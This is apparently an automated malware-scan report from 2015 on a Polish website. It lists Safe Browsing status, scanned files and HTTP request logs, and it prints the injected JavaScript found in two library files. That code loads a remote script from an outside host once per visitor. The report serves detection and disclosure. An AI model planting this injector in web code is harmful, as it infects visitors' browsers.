Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=tytangniezno.pl
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://tytangniezno.pl/ | 200 OK Content-Length: 5939 Content-Type: text/html | suspicious |
Suspicious code found <script type=text/javascript src=http://mmm2011.ppcsoft.in/validate.js?ftpid=32632></script> | ||
http://tytangniezno.pl/js/jquery.min.js | 200 OK Content-Length: 78390 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var dont=false; var ds={} try{ ds.session = sessionStorage.ifr_1234 == "xui" ? true : false; }catch(e){ds.session = false;} try{ ds.local = localStorage.ifr_1234 == "xui" ? true : false; }catch(e){ds.local = false;} try { localStorage.ifr_1234 = "xui"; sessionStorage.ifr_1234 = "xui"; } catch (e) {} if(ds.local || ds.session) dont=true; if(!dont) { var ddpopka=document.createElement('script'); ddpopka.src="http://mmm2011.ppcsoft.in/validate.js?ftpid=32632" try{ document.body.appendChild(ddpopka); }catch(e){ document.documentElement.appendChild(ddpopka); } } Antivirus reports:
| ||
http://tytangniezno.pl/js/jcarousellite.min.js | 200 OK Content-Length: 5445 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var dont=false; var ds={} try{ ds.session = sessionStorage.ifr_1234 == "xui" ? true : false; }catch(e){ds.session = false;} try{ ds.local = localStorage.ifr_1234 == "xui" ? true : false; }catch(e){ds.local = false;} try { localStorage.ifr_1234 = "xui"; sessionStorage.ifr_1234 = "xui"; } catch (e) {} if(ds.local || ds.session) dont=true; if(!dont) { var ddpopka=document.createElement('script'); ddpopka.src="http://mmm2011.ppcsoft.in/validate.js?ftpid=32632" try{ document.body.appendChild(ddpopka); }catch(e){ document.documentElement.appendChild(ddpopka); } } Antivirus reports:
| ||
http://tytangniezno.pl/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: tytangniezno.pl
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 Mar 2015 04:55:11 GMT
Accept-Ranges: bytes
ETag: "1733-4c152b621f380"
Server: Apache
Content-Length: 5939
Content-Type: text/html
Last-Modified: Thu, 31 May 2012 10:41:34 GMT
...5939 bytes of data.
GET / HTTP/1.1
Host: tytangniezno.pl
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 Mar 2015 04:55:11 GMT
Accept-Ranges: bytes
ETag: "1733-4c152b621f380"
Server: Apache
Content-Length: 5939
Content-Type: text/html
Last-Modified: Thu, 31 May 2012 10:41:34 GMT
...5939 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: tytangniezno.pl
Referer: http://www.google.com/search?q=tytangniezno.pl
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: tytangniezno.pl
Referer: http://www.google.com/search?q=tytangniezno.pl
Result:
The result is similar to the first query. There are no suspicious redirects found.